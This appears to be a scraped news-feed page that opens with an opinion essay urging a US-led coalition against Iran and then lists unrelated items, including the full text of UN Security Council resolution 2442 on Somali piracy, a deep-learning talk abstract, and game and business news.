For too long, the U.S. refrained from confronting the Iranian regime, out of hope that inaction against the Iranian regime would empower the purported moderates in Tehran.  The previous U.S. administration also held an overriding desire to wash its hands of the Middle East.  This entrenchment however, has only encouraged the Ayatollahs regime inherently maligned behavior, including its periodic testing to the limits of the nuclear deal, continued progress on advanced centrifuges, ballistic missile testing, and regional expansion.  In addition, the Tehran regime supports terrorism and the propagation of virulent anti-American ideology.  Ironically, many of these actions make the regime increasingly unpopular at home, and overextended abroad.

According to the U.S. State Department Executive Summary report titled “An Outlaw Regime: A Chronicle of Iran’s Destructive Activities, “The regime’s primary tool to execute this mission since 1979 has been the Islamic Revolutionary Guard Corps (IRGC). The IRGC is the most powerful conglomerate in Iran, spreading and consolidating its control over much of Iranian life. Its navy regularly threatens freedom of navigation in the Persian Gulf while its Aerospace Force directs the country’s ballistic missile program in defiance of Security Council resolutions. Its Ground Forces are deployed abroad to bolster the Assad regime and its Basij paramilitary force is mobilized at home to surveil and harass ordinary Iranians. Finally, its extra-territorial IRGC Quds Force (IRGC-QF) leads the Islamic Republic’s destabilizing support for proxies and terrorist groups.”

The Islamic Republic’s illicit activities include undermining the integrity of the global financial system.  The Iranian regime relies on opaque and fraudulent financing activities to fund its proxies and support its proliferation of ballistic missiles and other weapons.  Last year, the IRGC-Quds Force was exposed for using front companies to move funds, procure restricted materials and technologies, exploit currency exchange networks in neighboring countries, and produce counterfeit currency.

Iran’s repeated and systemic abuse of human rights is in violation of international laws and norms.  It persecutes civil society activists and marginalizes ethnic and religious minorities.  The Ayatollah regime denies due process, and regularly falls short of its own legal standards. Its prisons are notorious for mistreatment and torture, and its use of capital punishment is excessive and extends to minors.  Outside its borders, Iran and its proxies have committed numerous human rights abuses, including targeting innocent civilians in Syria, and arbitrarily detaining Sunnis in Iraq.

Last September in New York, Secretary of State Mike Pompeo met with the foreign ministers of Egypt, Jordan, Saudi Arabia, United Arab Emirates (UAE), Kuwait, Qatar, Oman and Bahrain, to advance what the administration coined as the “Arab NATO.”  Secretary Pompeo stressed the need to defeat the Islamic State, and other terrorist organizations, as well as ending the conflicts in Syria and Yemen, and “stopping Iran’s malign activity in the region.”  Unfortunately, President Trump’s willingness to remain engaged in the Middle East following the defeat of the Islamic State is questionable.  The burden of compelling Iran to roll back its regional presence, especially in Syria, and interdicting Iran’s military supplies to Hezbollah in Lebanon, falls primarily on Israel’s shoulders.  Saudi Arabia and the Emirates are involved in confronting Iran’s weapons proliferation in Yemen.  U.S. involvement in the anti-Iran alliance is limited to partnering with the Kurds on the ground in Syria and Iraq.  The latter presents a significant obstacle to Iran’s ambitions to dominate both Syria and Iraq.

Without strong military backing from the U.S., Israel might be constrained by Russia from freely operating in Syria against Iran.  The Khashoggi murder, as contemptible as it was, must be put behind us, and allow the Saudis and the UAE to focus on Iran.  The rest of the Sunni Arab states are unlikely to contribute to the anti-Iran alliance, and Turkey’s support in such an alliance is certainly not forthcoming.  The U.S. envisioned anti-Iran coalition can only become a viable reality if the U.S. is ready to actively participate, and commit its military might only when it becomes necessary.


          Low Patent Quality and Patent Maximalism in General Are Bankrupting Real Businesses for the Sake/Gain of Litigation Firms and Trolls (Their Clients)      Cache   Translate Page      
Coming to grips with the fact that productive industries are being crushed for the sake of lawyers, whose firms often act as a front for exploitative patent trolls and monopolies
          Vegaudi van Pulderbos naar nieuwbouw in Emblem      Cache   Translate Page      
Bouwbedrijf Aannemingen Vegaudi heeft zijn nieuwe exploitatiezetel in Emblem officieel in gebruik genomen. Voordien zat het bedrijf in Pulderbos. Samen met de ingebruikname vierden zaakvoerders Antonio en Serafin Vega het 12-jarige bestaan van hun bedrijf met vele genodigden. Een verhuizing drong zich op door een uitbreiding van de activiteiten en het aantal medewerkers, waardoor de […]
Made in Kempen
          SecuPerts Anti-Spy for Windows 10       Cache   Translate Page      
L'Anti-Spy de Windows 10 vous permet de désactiver plus de 80 fonctions d'espionnage ennuyeuses et, dans une certaine mesure, très présomptueuses dans le système d'exploitation Windows 10, dans les navigateurs et les lecteurs multimédias. Vous pouvez désactiver plus de 80 fonctionnalités de snooping prédéfinies avec une simple clic - ou vous laissez Anti-Spy le générer sous forme de liste et vous décidez de ceux que vous souhaitez désactiver. Remarque: le programme comprend une licence de 1 an!
          Cleaning company fined $37k for exploiting staff      Cache   Translate Page      
A Waikato company and its director have been ordered to pay $37,500 for exploiting six members of its staff.
          ISL Colloquium presents Estimating the Information Flow in Deep Neural Networks      Cache   Translate Page      

This talk will discuss the flow of information and the evolution of internal representations during deep neural network (DNN) training, aiming to demystify the compression aspect of the information bottleneck theory. The theory suggests that DNN training comprises a rapid fitting phase followed by a slower compression phase, in which the mutual information I(X;T) between the input X and internal representations T decreases. Several papers observe compression of estimated mutual information on different DNN models, but the true I(X;T) over these networks is provably either constant (discrete X) or infinite (continuous X). We will explain this discrepancy between theory and experiments, and explain what was actually measured by these past works.

To this end, an auxiliary (noisy) DNN framework will be introduced, in which I(X;T) is a meaningful quantity that depends on the network's parameters. We will show that this noisy framework is a good proxy for the original (deterministic) system both in terms of performance and the learned representations. To accurately track I(X;T) over noisy DNNs, a differential entropy estimator tailor to exploit the DNN's layered structure will be developed and theoretical guarantees on the associated minimax risk will be provided. Using this estimator along with a certain analogy to an information-theoretic communication problem, we will elucidate the geometric mechanism that drives compression of I(X;T) in noisy DNNs. Based on these findings, we will circle back to deterministic networks and explain what the past observations of compression were in fact showing. Future research directions inspired by this study aiming to facilitate a comprehensive information-theoretic understanding of deep learning will also be discussed.


          Breaking Bad Movie Secretly In-Development; Starts Filming This Fall      Cache   Translate Page      
A surprise <a href="https://screenrant.com/tag/breaking-bad/"><strong><em>Breaking Bad</em></strong></a> movie is coming through the pipeline and reportedly starts filming later this fall. Widely considered one of the finest television dramas of all-time, Vince Gilligan's epic crime saga remains among AMC's flagship properties. After <em>Breaking Bad</em> concluded its prolific five-season run back in 2013, the network quickly moved ahead with the prequel/spinoff series, <a href="https://screenrant.com/tag/better-call-saul/"><em>Better Call Saul</em></a>. Following the exploits of a pre-<em>Breaking Bad</em> Jimmy McGill, <em>Saul</em> has become an acclaimed show in its own right, earning several accolades across its four seasons.
          Somalia: Security Council Adopts Resolution 2442 (2018), Authorizing 12-Month Extension for International Naval Forces Fighting Piracy off Somali Coast      Cache   Translate Page      
Source: UN Security Council
Country: Somalia

SC/13566
6 NOVEMBER 2018
SECURITY COUNCIL
8391ST MEETING (AM)

The Security Council, acting by consensus today, decided to renew for 12 months authorizations allowing international naval forces to join in the fight against piracy in the waters off the coast of Somalia.

Adopting resolution 2442 (2018) under Chapter VII of the United Nations Charter, the 15-member Council deplored all acts of piracy and armed robbery at sea off the Somali coast. While noting improvements in Somalia, it nevertheless recognized that piracy exacerbates instability in the country and stressed the need for a comprehensive, international response that also works to tackle the underlying causes of the phenomenon.

By the terms of the text, the Council encouraged the Parliament of Somalia to approve a draft coast guard law and urged the Somali authorities to continue efforts towards passing a comprehensive set of anti-piracy and maritime laws without further delay. It also called upon the authorities to make all efforts to bring to justice those who are using Somali territory to plan, facilitate or undertake criminal acts of piracy and armed robbery at sea, while calling upon Member States to assist Somalia ‑ at the request of Somali authorities and with notification to the Secretary-General ‑ to strengthen its maritime capacity.

Welcoming the initiative of the Seychelles to establish a court for piracy and maritime crime and the successful prosecution of piracy cases by that entity, the Council also recognized the need for States, international and regional organizations and other appropriate partners to share information for anti-piracy law enforcement purposes. In addition, it noted the need for those partners to keep under review the possibility of applying targeted sanctions against individuals or entities that plan, organize, facilitate, or illicitly finance or profit from piracy operations if they meet the listing criteria set out in paragraph 43 of resolution 2093 (2013). The Council also called upon all States to cooperate fully with the Somalia and Eritrea Monitoring Group.

By other terms of the resolution, the Council renewed its call upon States and regional organizations that are able to do so to join the fight against piracy and armed robbery off the coast of Somalia by deploying naval vessels, arms and military aircraft; providing basing and logistical support for counter-piracy forces; and seizing and disposing of boats, vessels, arms and other related equipment used in the commission of piracy-related crimes. It further encouraged the Government of Somalia to accede to the United Nations Convention Against Transnational Organized Crime and urged all States to take appropriate actions under their domestic laws to prevent the illicit financing of piracy acts and the laundering of its proceeds.

The meeting began at 10:05 a.m. and ended at 10:07 a.m.

Resolution

The full text of resolution 2442 (2018) reads as follows:

“The Security Council,

“Recognizing that 2018 marks the tenth anniversary of resolution 1816 on the situation with respect to piracy and armed robbery at sea off the coast of Somalia and recalling its previous resolutions concerning the situation in Somalia, especially resolutions 1814 (2008), 1816 (2008), 1838 (2008), 1844 (2008), 1846 (2008), 1851 (2008), 1897 (2009), 1918 (2010), 1950 (2010), 1976 (2011), 2015 (2011), 2020 (2011), 2077 (2012) 2125 (2013), 2184 (2014), 2246 (2015), and 2316 (2016) and 2383 (2017) as well as the Statement of its President (S/PRST/2010/16) of 25 August 2010 and (S/PRST/2012/24) of 19 November 2012,

“Welcoming the report of the Secretary-General (S/2018/903), as requested by resolution 2383 (2017), on the implementation of that resolution and on the situation with respect to piracy and armed robbery at sea off the coast of Somalia,

“Reaffirming its respect for the sovereignty, territorial integrity, political independence, and unity of Somalia, including Somalia’s sovereign rights in accordance with international law, with respect to offshore natural resources, including fisheries,

“Noting that the joint counter-piracy efforts of States, regions, organizations, the maritime industry, the private sector, think tanks, and civil society have resulted in a steady decline in pirate attacks as well as hijackings since 2011, with no successful ship hijackings reported off the coast of Somalia since March 2017 however, recognizing the ongoing threat that resurgent piracy and armed robbery at sea poses to the prompt, safe, and effective delivery of humanitarian aid to Somalia and the region, to the safety of seafarers and other persons, to international navigation and the safety of commercial maritime routes, and to other ships, including fishing vessels operating in conformity with international law, commending countries that have deployed naval forces in the Gulf of Aden and the Somali Basin to dissuade piracy networks from carrying out acts of piracy,

“Welcoming the reinstatement of the Somali Maritime Security Coordination Committee (MSCC) meeting held from 9 to 10 July 2018 between the Federal Government of Somalia, Federal Member States and international partners which called for enhanced cooperation in strengthening Somalia’s maritime security as a key priority for both the Federal Government of Somalia and Federal Member States and urged the National Security Council to agree on a delineation of roles of the Somali maritime forces, as required by the Transition Plan and recognizing the importance of engaging in transition planning,

“Further reaffirming that international law, as reflected in the United Nations Convention on the Law of the Sea of 10 December 1982, sets out the legal framework applicable to activities in the ocean, including countering piracy and armed robbery at sea,

“Recognizing the need to investigate and prosecute not only suspects captured at sea, but also anyone who incites or intentionally facilitates piracy operations, including key figures of criminal networks involved in piracy who plan, organize, facilitate, or illicitly finance or profit from such attacks, and reiterating its concern over persons suspected of piracy having been released without facing justice, reaffirming that the failure to prosecute persons responsible for acts of piracy and armed robbery at sea off the coast of Somalia undermines anti-piracy efforts,

“Noting with concern that the continuing limited capacity and domestic legislation to facilitate the custody and prosecution of suspected pirates after their capture has hindered more robust international action against pirates off the coast of Somalia, which has led to pirates in many cases being released without facing justice, regardless of whether there is sufficient evidence to support prosecution, and reiterating that, consistent with the provisions of United Nations Convention on the Law of the Sea concerning the repression of piracy, the 1988 Convention for the Suppression of Unlawful Acts Against the Safety of Maritime Navigation provides for parties to create criminal offences, establish jurisdiction, and accept delivery of persons responsible for, or suspected of seizing, or exercising control over, a ship by force or threat thereof, or any other form of intimidation,

“Underlining the primary responsibility of the Somali authorities in the fight against piracy and armed robbery at sea off the coast of Somalia, noting the several requests from Somali authorities for international assistance to counter piracy off its coast, including the letter of 25 October 2018, from the Permanent Representative of the Permanent Mission of Somalia to the United Nations expressing the appreciation of Somali authorities to the Security Council for its assistance, expressing their willingness to consider working with other States and regional organizations to combat piracy and armed robbery at sea off the coast of Somalia, asking member states and international organizations to support the Federal Government of Somalia in its efforts to address illegal, unreported, and unregulated fishing in its Exclusive Economic Zone, and requesting that the provisions of resolution 2383 (2017) be renewed for an additional 12 months,

“Welcoming the participation of the Federal Government of Somalia and regional partners in the 21st plenary session of the Contact Group on Piracy off the Coast of Somalia (CGPCS) in Nairobi, Kenya, 11–13 July 2018, co-hosted by the Indian Ocean Commission under the Chairmanship of Mauritius,

“Recognizing the work of the CGPCS and the Law Enforcement Task Force to facilitate the prosecution of suspected pirates, and the intentions of the Regional Capacity Building Working Group to identify regional priorities and coordination of capacity-building activities and regional responsibilities,

“Noting the progress made to enhance Somali capacity building through the National Maritime Coordination Committee (NMCC) to assess maritime priorities between the Federal Government of Somalia and Federal Member States,

“Welcoming the financing provided by the Trust Fund to Support Initiatives of States Combating Piracy off the Coast of Somalia (the Trust Fund) to strengthen regional ability to prosecute suspected pirates and imprison those convicted in accordance with applicable international human rights law, noting with appreciation the assistance provided by the United Nations Office of Drugs and Crime (UNODC) Maritime Crime Programme, and being determined to continue efforts to ensure that pirates are held accountable,

“Commending the efforts of the European Union Naval Forces (EUNAVFOR) Operation ATALANTA and EUCAP Somalia, Combined Maritime Forces’ Combined Task Force 151, the counter-piracy activities of the African Union onshore in Somalia and other States acting in a national capacity in cooperation with Somali authorities and each other to suppress piracy and to protect ships transiting through the waters off the coast of Somalia, and welcoming the Shared Awareness and Deconfliction Initiative (SHADE) and the efforts of individual countries, including China, India, the Islamic Republic of Iran, Japan, the Republic of Korea, and the Russian Federation, which have deployed naval counter-piracy missions in the region,

“Noting the efforts of flag States for taking measures to permit vessels sailing under their flag transiting the High Risk Area (HRA) to embark vessel protection detachments and privately contracted armed security personnel (PCASP), and to allow charters that favour arrangements that make use of such measures, while urging States to regulate such activities in accordance with applicable international law,

“Welcoming and encouraging the capacity-building efforts in the region made by the International Maritime Organization (IMO) funded Djibouti Code of Conduct, the Trust Fund and the European Union’s activities under the EU Capacity Building Mission in Somalia (EUCAP Somalia) which assists Somalia in strengthening its maritime security capacity in order to enable it to enforce maritime law more effectively, and recognizing the need for all engaged international and regional organizations to coordinate and cooperate fully,

“Supporting the development of a coastguard at the federal level and coastguard police at the Federal Member State level, noting with appreciation the efforts made by the IMO and the shipping industry to develop and update guidance, best management practices, and recommendations to assist ships to prevent and suppress piracy attacks off the coast of Somalia, including in the Gulf of Aden, and in relevant parts of the Indian Ocean that are still within the High Risk Area and recognizing the work of the IMO and the CGPCS in this regard, noting the efforts of the International Organization for Standardization, which has developed industry standards of training and certification for Private Maritime Security Companies when providing PCASP on board ships in high-risk areas, and further welcoming the European Union’s EUCAP Somalia, which is working to develop the maritime security capacities of Somalia,

“Underlining the importance of continuing to enhance the collection, preservation, and transmission to competent authorities of evidence of acts of piracy and armed robbery at sea off the coast of Somalia, and welcoming the ongoing work of the IMO, INTERPOL, and industry groups to develop guidance to seafarers on preservation of crime scenes following acts of piracy, and noting the importance of enabling seafarers to give evidence in criminal proceedings to prosecute acts of piracy,

“Further recognizing that pirate networks continue to rely on kidnapping and hostage-taking to help generate funding to purchase weapons, gain recruits, and continue their operational activities, thereby jeopardizing the safety and security of civilians and restricting the flow of commerce, and welcoming international efforts to coordinate the work of investigators and prosecutors, inter alia, through the Law Enforcement Task Force and collect and share information to disrupt the pirate enterprise, as exemplified by INTERPOL’s Global Database on Maritime Piracy, and commending the establishment of the Maritime Information Fusion Centre (RMIFC) in Madagascar, the sister centre of the Regional Centre for Operational Coordination (RCOC) in Seychelles following the signing of the Regional Agreement for the Setting up of a Regional Maritime Information Exchange and Sharing Mechanism in the Western Indian Ocean by Djibouti, Madagascar, Mauritius, Union of Comoros and Seychelles , including the establishment of the Piracy Prosecution Readiness Plan which, under the auspices of UNODC and in partnership with EU NAVFOR, will further develop the region’s capacity to conduct piracy prosecutions,

“Reaffirming international condemnation of acts of kidnapping and hostage-taking, including offences contained within the International Convention against the Taking of Hostages, strongly condemning the continuing practice of hostage-taking by pirates operating off the coast of Somalia, expressing serious concern at the inhumane conditions hostages face in captivity, recognizing the adverse impact on their families, calling for the immediate release of all remaining hostages, and noting the importance of cooperation between Member States on the issue of hostage-taking and the prosecution of suspected pirates for taking hostages,

“Commending Kenya, Mauritius, Seychelles, and the United Republic of Tanzania, for their efforts to prosecute suspected pirates in their national courts, and noting with appreciation the assistance provided by the UNODC Maritime Crime Programme, the Trust Fund, and other international organizations and donors, in coordination with the CGPCS, to support Kenya, Mauritius, Seychelles, the United Republic of Tanzania, Somalia, and other States in the region with their efforts to prosecute, or incarcerate in a third State after prosecution elsewhere, pirates, including facilitators and financiers ashore, consistent with applicable international human rights law, and emphasizing the need for States and international organizations to further enhance international efforts in this regard,

“Welcoming the readiness of the Federal Government of Somalia and Federal Member States to cooperate with each other and with States who have prosecuted suspected pirates with a view to enabling convicted pirates to be repatriated back to Somalia under suitable prisoner transfer arrangements, consistent with applicable international law, including international human rights law, and acknowledging the return from Seychelles to Somalia of convicted prisoners willing and eligible to serve their sentences in Somalia, and noting that the sentences served must be those passed by the courts of the prosecuting states and that any proposal to vary the sentences must be in conformity with the 2011 Transfer Agreement with the Seychelles,

“Welcoming the work of the Maritime Security Coordination Committee (MSCC), the central mechanism for developing capability and identifying and channelling support, as highlighted at the London Somalia Conference in May 2017, and encouraging the Somali national and regional administrations to take increasing responsibility for counter-piracy initiatives,

“Expressing serious concern over reports of illegal, unreported and unregulated fishing (IUU) in Somalia’s Exclusive Economic Zone (EEZ), and noting the complex relationship between IUU fishing and piracy, recognizing that IUU fishing accounts for millions of dollars in lost revenue for Somalia each year, and can contribute to destabilization among coastal communities,

“Noting Somalia’s accession to the FAO’s Agreement on Port State Measures to Prevent, Deter and Eliminate Illegal, Unreported and Unregulated Fishing, recognizing the projects supported by FAO and UNODC aimed at enhancing Somalia’s capacity to combat such activities, and stressing the need for States and international organizations to further intensify their support to the Federal Government of Somalia, at its request, in enhancing Somalia’s capacity to combat such activities,

“Recognizing the ongoing efforts of the Federal Government of Somalia towards the development of a legal regime for the distribution of fishing licences, commending in this regard the implementation of a component of the EU-funded Programme to Promote Regional Maritime Security (CCAP) with FAO aims to promote proper and transparent licensed and regulated fishing with regional states, and encouraging further efforts in this regard, with the support of the international community,

“Recalling the reports of the Secretary General which illustrate the seriousness of piracy and armed robbery at sea off the coast of Somalia and provide useful guidance for the investigation and prosecution of pirates, including on specialized anti-piracy courts,

“Remaining concerned that four-Iranian seafarers from the FV Siraj remain as hostages inside Somalia in appalling conditions, and welcoming the work of International Seafarers Welfare and Assistance Network (ISWAN) and Maritime Piracy Humanitarian Response Programme (MPHRP) in the provision of post trauma intervention and financial support to victims of piracy and their families; as well as the CGPCS Piracy Survivors Family Fund (PSFF), which provides funds for the survivors of Somali piracy, and for their families, to provide a range of support during and after captivity and recognizing the need to continue supporting these initiatives and contributions to funds,

“Recognizing the progress made by the CGPCS and UNODC in the use of public information tools to raise awareness of the dangers of piracy and highlight the best practices to eradicate this criminal phenomenon,

“Noting efforts by UNODC and UNDP and the funding provided by the Trust Fund, the European Union, the United Kingdom, the United States, and other donors to develop regional judicial and law enforcement capacity to investigate, arrest, and prosecute suspected pirates and to incarcerate convicted pirates consistent with applicable international human rights law,

“Bearing in mind the Djibouti Code of Conduct concerning the Repression of Piracy and Armed Robbery against Ships in the Western Indian Ocean and the Gulf of Aden, noting the operations of information-sharing centres in, Kenya, and the United Republic of Tanzania, recognizing the efforts of signatory States to develop the appropriate regulatory and legislative frameworks to combat piracy, enhance their capacity to patrol the waters of the region, interdict suspect vessels, and prosecute suspected pirates,

“Emphasizing that peace and stability within Somalia, the strengthening of State institutions, economic and social development, and respect for human rights and the rule of law are necessary to create the conditions for a durable eradication of piracy and armed robbery at sea off the coast of Somalia, and further emphasizing that Somalia’s long-term security rests with the effective development by Somali authorities of the Somali Coast Guard and Maritime Police Units, Somali National Army, and Somali Police Force,

“Welcoming the Padang Communique and Maritime Cooperation Declaration adopted by the Indian Ocean Rim Association (IORA) at its 15th Council of Ministers meeting, which call upon members to support and strengthen cooperation to address maritime challenges including piracy and illegal trafficking of drugs,

“Welcoming the publication in June 2018 by BIMCO, International Chamber of Shipping, International Group of Protection & Indemnity Clubs, Intertanko, The Oil Companies International Marine Forum and others, of version 5 of Best Management Practices to deter Piracy and Enhance Maritime Security in the Red Sea, Gulf of Aden, Indian Ocean and the Arabian Sea (BMP5), acknowledging that the information and guidance contained within helps to reduce the risks to mariners and seafarers engaged in their lawful occupations,

“Recognizing that the ongoing instability in Somalia and the acts of piracy and armed robbery at sea off its coast are inextricably linked, and stressing the need to continue the comprehensive response by the international community to repress piracy and armed robbery at sea and tackle its underlying causes,

“Determining that the incidents of piracy and armed robbery at sea off the coast of Somalia, as well as the activity of pirate groups in Somalia, are an important factor exacerbating the situation in Somalia, which continues to constitute a threat to international peace and security in the region,

“Acting under Chapter VII of the Charter of the United Nations,

“1. Reiterates that it condemns and deplores all acts of piracy and armed robbery at sea off the coast of Somalia;

“2. While noting improvements in Somalia, recognizes that piracy exacerbates instability in Somalia by introducing large amounts of illicit cash that fuels additional crime, corruption, and terrorism;

“3. Stresses the need for a comprehensive response to prevent and suppress piracy and tackle its underlying causes by the international community in collaboration with Somali authorities and other relevant actors;

“4. Underlines the primary responsibility of the Somali authorities in the fight against piracy and armed robbery at sea off the coast of Somalia, encourages the approval by the Parliament of the draft coast guard law which the Somali authorities, with the support of EUNAVFOR Operation Atalanta and EUCAP Somalia have submitted to the Council of Ministers and urges the Somali authorities, to continue their work to pass a comprehensive set of anti-piracy and maritime laws without further delay and establish security forces with clear roles and jurisdictions to enforce these laws and to continue to develop, with international support as appropriate, the capacity of Somali courts to investigate and prosecute persons responsible for acts of piracy and armed robbery, including key figures of criminal networks involved in piracy who plan, organize, facilitate, or illicitly finance or profit from such attacks;

“5. Recognizes the need to continue investigating and prosecuting those who plan, organize, or illicitly finance or profit from pirate attacks off the coast of Somalia, including key figures of criminal networks involved in piracy, urges States, working in conjunction with relevant international organizations, to adopt legislation to facilitate prosecution of suspected pirates off the coast of Somalia;

“6. Calls upon the Somali authorities to interdict, and upon interdiction to have mechanisms in place to safely return effects seized by pirates, investigate and prosecute pirates and to patrol the waters off the coast of Somalia to prevent and suppress acts of piracy and armed robbery at sea;

“7. Calls upon the Somali authorities to make all efforts to bring to justice those who are using Somali territory to plan, facilitate, or undertake criminal acts of piracy and armed robbery at sea, and calls upon Member States to assist Somalia, at the request of Somali authorities and with notification to the Secretary-General, to strengthen maritime capacity in Somalia, including regional authorities and, stresses that any measures undertaken pursuant to this paragraph shall be consistent with applicable international law, in particular international human rights law;

“8. Calls upon States to cooperate also, as appropriate, on the issue of hostage taking, and the prosecution of suspected pirates for taking hostages;

“9. Calls for the immediate and unconditional release of all seafarers held hostage by Somali pirates, and further calls upon the Somali authorities and all relevant stakeholders to redouble their efforts to secure their safe and immediate release;

“10. Welcomes the initiative of the Seychelles authorities to establish a court for piracy and maritime crime and further welcomes the successful prosecution of piracy cases by this body;

“11. Recognizes the need for States, international and regional organizations, and other appropriate partners to exchange evidence and information for anti-piracy law enforcement purposes with a view to ensuring effective prosecution of suspected, and imprisonment of convicted, pirates and with a view to the arrest and prosecution of key figures of criminal networks involved in piracy who plan, organize, facilitate, or illicitly finance and profit from piracy operations, and keeps under review the possibility of applying targeted sanctions against individuals or entities that plan, organize, facilitate, or illicitly finance or profit from piracy operations if they meet the listing criteria set out in paragraph 43 of resolution 2093 (2013), and calls upon all States to cooperate fully with the Somalia and Eritrea Monitoring Group, including on information-sharing regarding possible violations of the arms embargo or charcoal ban;

“12. Renews its call upon States and regional organizations that are able to do so to take part in the fight against piracy and armed robbery at sea off the coast of Somalia, in particular, consistent with this resolution and international law, by deploying naval vessels, arms, and military aircraft, by providing basing and logistical support for counter-piracy forces, and by seizing and disposing of boats, vessels, arms, and other related equipment used in the commission of piracy and armed robbery at sea off the coast of Somalia, or for which there are reasonable grounds for suspecting such use;

“13. Highlights the importance of coordination among States and international organizations in order to deter acts of piracy and armed robbery at sea off the coast of Somalia, commends the work of the CGPCS to facilitate such coordination in cooperation with the IMO, flag States, and Somali authorities, and urges continued support of these efforts;

“14. Encourages Member States to continue to cooperate with Somali authorities in the fight against piracy and armed robbery at sea, notes the primary role of Somali authorities in the fight against piracy and armed robbery at sea off the coast of Somalia, and decides that, for a further period of 13 months from the date of this resolution to renew the authorizations as set out in paragraph 14 of resolution 2383 (2017) granted to States and regional organizations cooperating with Somali authorities in the fight against piracy and armed robbery at sea off the coast of Somalia, for which advance notification has been provided by Somali authorities to the Secretary-General;

“15. Affirms that the authorizations renewed in this resolution apply only with respect to the situation in Somalia and shall not affect the rights, obligations, or responsibilities of Member States under international law, including any rights or obligations under United Nations Convention on the Law of the Sea, with respect to any other situation, and underscores in particular that this resolution shall not be considered as establishing customary international law; and affirms further that such authorizations have been renewed in response to the 25 October 2018 letter conveying the request of Somali authorities;

“16. Decides that the arms embargo on Somalia imposed by paragraph 5 of resolution 733 (1992) and further elaborated upon by paragraphs 1 and 2 of resolution 1425 (2002) and modified by paragraphs 33 to 38 of resolution 2093 does not apply to supplies of weapons and military equipment or the provision of assistance destined for the sole use of Member States, international, regional, and subregional organizations undertaking measures in accordance with paragraph 14 above;

“17. Requests that cooperating States take appropriate steps to ensure that the activities they undertake pursuant to the authorizations in paragraph 14 do not have the practical effect of denying or impairing the right of innocent passage to the ships of any third State;

“18. Calls upon all States, and in particular flag, port, and coastal States, States of the nationality of victims and perpetrators of piracy and armed robbery, and other States with relevant jurisdiction under international law and national legislation, to cooperate in determining jurisdiction and in the investigation and prosecution of all persons responsible for acts of piracy and armed robbery off the coast of Somalia, including key figures of criminal networks involved in piracy who plan, organize, facilitate, or illicitly finance or profit from such attack, consistent with applicable international law including international human rights law, to ensure that all pirates handed over to judicial authorities are subject to a judicial process, and to render assistance by, among other actions, providing disposition and logistics assistance with respect to persons under their jurisdiction and control, such as victims, witnesses, and persons detained as a result of operations conducted under this resolution;

“19. Calls upon all States to criminalize piracy under their domestic law and to favourably consider the prosecution of suspected, and imprisonment of those convicted, pirates apprehended off the coast of Somalia, and their facilitators and financiers ashore, consistent with applicable international law, including international human rights law, and decides to keep these matters under review, including, as appropriate, the establishment of specialized anti-piracy courts in Somalia with substantial international participation and/or support as set forth in resolution 2015 (2011), and encourages the CGPCS to continue its discussions in this regard;

“20. Welcomes, in this context, the UNODC Maritime Crime Programme’s continued work with authorities in Somalia and in neighbouring States to ensure that individuals suspected of piracy are prosecuted and those convicted are imprisoned in a manner consistent with international law, including international human rights law;

“21. Encourages the Federal Government of Somalia to accede to the United Nations Convention Against Transnational Organized Crime, as part of its efforts to target money laundering and financial support structures on which piracy networks survive;

“22. Urges all States to take appropriate actions under their existing domestic law to prevent the illicit financing of acts of piracy and the laundering of its proceeds;

“23. Urges States, in cooperation with INTERPOL and Europol, to further investigate international criminal networks involved in piracy off the coast of Somalia, including those responsible for illicit financing and facilitation;

“24. Urges all States to ensure that counter-piracy activities, particularly land-based activities, take into consideration the need to protect women and children from exploitation, including sexual exploitation;

“25. Urges all States to share information with INTERPOL for use in the global piracy database, through appropriate channels;

“26. Commends the contributions of the Trust Fund and the IMO-funded Djibouti Code of Conduct and urges both state and non-State actors affected by piracy, most notably the international shipping community, to contribute to them;

“27. Urges States parties to United Nations Convention on the Law of the Sea and the Convention for the Suppression of Unlawful Acts Against the Safety of Maritime Navigation to implement fully their relevant obligations under these conventions and customary international law and to cooperate with the UNODC, IMO, and other States and international organizations to build judicial capacity for the successful prosecution of persons suspected of piracy and armed robbery at sea off the coast of Somalia;

“28. Acknowledges the recommendations and guidance provided by the IMO on preventing and suppressing piracy and armed robbery at sea; and urges States, in collaboration with the shipping and insurance industries and the IMO, to continue to develop and implement avoidance, evasion, and defensive best practices and advisories to take when under attack or when sailing in the waters off the coast of Somalia, and further urges States to make their citizens and vessels available for forensic investigation as appropriate at the first suitable port of call immediately following an act or attempted act of piracy or armed robbery at sea or release from captivity;

“29. Encourages flag States and port States to further consider the development of safety and security measures on board vessels, including, where applicable, developing regulations for the use of PCASP on board ships, aimed at preventing and suppressing piracy off the coast of Somalia, through a consultative process, including through the IMO and ISO;

“30. Invites the IMO to continue its contributions to the prevention and suppression of acts of piracy and armed robbery against ships, in coordination, in particular, with the UNODC, the World Food Program (WFP), the shipping industry, and all other parties concerned, and recognizes the IMO’s role concerning privately contracted armed security personnel on board ships in high-risk areas;

“31. Notes the importance of securing the safe delivery of WFP assistance by sea, and welcomes the ongoing work by the WFP, EUNAVFOR Operation Atalanta, and flag States with regard to Vessel Protection Detachments on WFP vessels;

“32. Requests States and regional organizations cooperating with Somali authorities to inform the Security Council and the Secretary-General in nine months of the progress of actions undertaken in the exercise of the authorizations provided in paragraph 14 above and further requests all States contributing through the CGPCS to the fight against piracy off the coast of Somalia, including Somalia and other States in the region, to report by the same deadline on their efforts to establish jurisdiction and cooperation in the investigation and prosecution of piracy;

“33. Requests the Secretary-General to report to the Security Council within twelve months of the adoption of this resolution on the implementation of this resolution and on the situation with respect to piracy and armed robbery at sea off the coast of Somalia;

“34. Expresses its intention to review the situation and consider, as appropriate, renewing the authorizations provided in paragraph 14 above for additional periods upon the request of Somali authority;

“35. Decides to remain seized of the matter.”

For information media. Not an official record.


          Grim and the Wicked Players' Guide - Free Preview 1      Cache   Translate Page      
Grim and the Wicked Players' Guide - Free Preview 1Publisher: GeoQuester Gaming

This is a free preview copy of the Oath of the Crusader paladin archetype found in the Grim and the Wicked Players' Guide.

For nearly three years, we've worked on putting together and testing the Players' Guide. Here's a break down of what's in the 256-page full-color book (due out August 2019):

  • Additional standard race subraces.
  • 7 new character races (including: the giantkin, as played by Tebo in Return of the Wraithborne and Mint in Blood of the Crown; the soulforged, as played by Lo4Life in Beast Pits of Ravenna; and the pactborn, as played by EraserTX in Beast Pits of Ravenna and HawkEye in Blood of the Crown)
  • 6 new archetypes per character class (including: Circle of the Twilight Grove druid archetype, as played by Rob2e in Return of the Wraithborne)
  • 2 new base character classes: the gunslinger and the witch, includes additional archetypes, witch hexes, and gunslinger exploits
  • Dozens of feats, proficiencies, and character options.
